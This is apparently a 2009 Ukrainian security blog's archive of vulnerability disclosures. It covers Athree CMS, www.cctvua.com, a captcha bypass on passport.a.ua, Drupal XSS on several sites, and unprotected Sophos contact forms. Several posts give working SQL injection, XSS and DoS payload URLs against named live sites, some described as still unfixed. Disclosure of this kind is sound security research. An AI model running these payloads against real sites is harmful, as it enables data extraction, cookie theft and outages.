Архів для категорії 'Уразливості'

Уразливість на passport.a.ua

20:27 14.03.2009

15.11.2008

У грудні, 19.12.2007, я знайшов Insufficient Anti-automation уразливість на сайті http://passport.a.ua. Уразливість в капчі порталу A.UA. Про що найближчим часом сповіщу адміністрацію сайта.

Останній раз стосовно проектів A.UA я писав про уразливість на shop.a.ua.

Детальна інформація про уразливість з’явиться пізніше.

14.03.2009

Insufficient Anti-automation:

Уразливість в капчі на сторінці реєстрації. Яка вразлива до MustLive CAPTCHA bypass method, що я описав в проекті Місяць багів в Капчах.

Для атаки потрібно посилати одні й ті самі значення параметрів code і security_refid (наприклад, code = JIK та security_refid = 0098f80e6eabe0b7c74427c4e9e6949b). Одна пара цих значень працює на протязі тривалого часу.

Дана уразливість досі не виправлена.

Добірка уразливостей

16:15 13.03.2009

В даній добірці уразливості в веб додатках:

Уразливості на 123teachme.com, pgdc.com і numbersusa.com

23:54 12.03.2009

В лютому я писав про нову XSS уразливість в Drupal. І 21.02.2009 я зробив дослідження сайтів на движку Drupal, і виявив чимало сайтів на старих версіях Drupal, що мають цю дірку.

Зокрема я виявив наступні сайти з Cross-Site Scripting уразливістю: http://123teachme.com, http://pgdc.com і http://numbersusa.com (які використовують даний движок).

XSS:

http://123teachme.com

http://pgdc.com

http://numbersusa.com

Уразливості в Athree CMS

20:08 12.03.2009

01.07.2008

У листопаді, 02.11.2007, я знайшов SQL DB Structure Extraction, SQL Injection, Cross-Site Scripting та Denial of Service уразливості в системі Athree CMS (Athree CMS Lite). Як раз коли виявив уразливості на www.cctvua.com, де і використовується цей движок.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

12.03.2009

SQL DB Structure Extraction:

http://site/?p=1;c=1′;s=1

SQL Injection:

http://site/?p=1;c=1;s=1%20and%20version()%3E4

http://site/?p=1;c=1%20and%20version()%3E4;s=1

http://site/?p=-1%20union%20select%20version(),1,1/*;c=1;s=1

Дві blind SQL Injection та одна звичайна SQL ін’єкція.

XSS (через SQL Injection):

http://site/?p=-1%20union%20select%20'%3Cscript%3Ealert(document.cookie)%3C/script%3E',1,1/*;c=1;s=1

DoS (через SQL Injection):

http://site/?p=1;c=1;s=-1%20or%201=1/*

http://site/?p=1%20or%201=1/*;c=1;s=1

Нова уразливість на www.shram.kiev.ua

23:55 11.03.2009

У квітні, 16.04.2008, я знайшов нову Cross-Site Scripting уразливість на сайті http://www.shram.kiev.ua (на якому є й розділ про хакерство і безпеку). Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливість на www.shram.kiev.ua.

XSS:

P.S.

На сайті є чимало інших уразливостей. До чого можуть призвести дірки на сайті (що мають місце на www.shram.kiev.ua тривалий час) я продемонстрував безпосередньо на даному сайті ;-) .

Добірка уразливостей

17:28 11.03.2009

В даній добірці уразливості в веб додатках:

XSS уразливість в WordPress MU 2.6.x

23:59 10.03.2009

Сьогодні була оприлюднена Cross-Site Scripting уразливість в WordPress MU. Уразливі WordPress MU 2.6.x та попередні версії (до версії 2.7).

Атака відбувається через HTTP заголовок HOST. Уразливість в profile.php де не фільтрується значення HTTP_HOST.

  • Wordpress MU < 2.7 'HOST' HTTP Header XSS Vulnerability (деталі)

Уразливості на www.cctvua.com

19:41 10.03.2009

27.06.2008

У листопаді, 02.11.2007, я знайшов SQL DB Structure Extraction, SQL Injection, Cross-Site Scripting та Denial of Service уразливості на секюріті проекті http://www.cctvua.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

10.03.2009

SQL DB Structure Extraction

http://www.cctvua.com/?p=202989;c=1′;s=28

SQL Injection:

http://www.cctvua.com/?p=202989;c=1;s=1%20and%20version()%3E4

http://www.cctvua.com/?p=202989;c=1%20and%20version()%3E4;s=28

http://www.cctvua.com/?p=-1%20union%20select%20version(),1,1/*;c=1;s=28

Дві blind SQL Injection та одна звичайна SQL ін’єкція.

XSS (через SQL Injection):

DoS (через SQL Injection):

http://www.cctvua.com/?p=202989;c=1;s=-1%20or%201=1/*

http://www.cctvua.com/?p=202989%20or%201=1/*;c=1;s=28

Дані уразливості досі не виправлені.

Уразливості на www.sophos.com

23:56 09.03.2009

У квітні, 24.04.2008, я знайшов Insufficient Anti-automation уразливості на http://www.sophos.com - сайті секюріті компанії Sophos. Що є відомим виробником антивірусних і антиспам продуктів.

Insufficient Anti-automation:

Зазначу, що з минулого року дані уразливі контактні форми перемістилися з www.sophos.com на secure.sophos.com. Більш безпечними вони від цього не стали.

https://secure.sophos.com/support/suggestion/
https://secure.sophos.com/support/application/
https://secure.sophos.com/support/query/
https://secure.sophos.com/support/samples/

Контактні форми не мають захисту від автоматизованих запитів (капчі). Що є звичайним явищем на сайтах секюріті компаній, які “полюбляють” мати Insufficient Anti-automation уразливості на своїх сайтах (як наприклад Cisco та IBM). Демонструючи тим самим вибірковий підхід до безпеки.

Добірка уразливостей

17:25 09.03.2009

В даній добірці уразливості в веб додатках: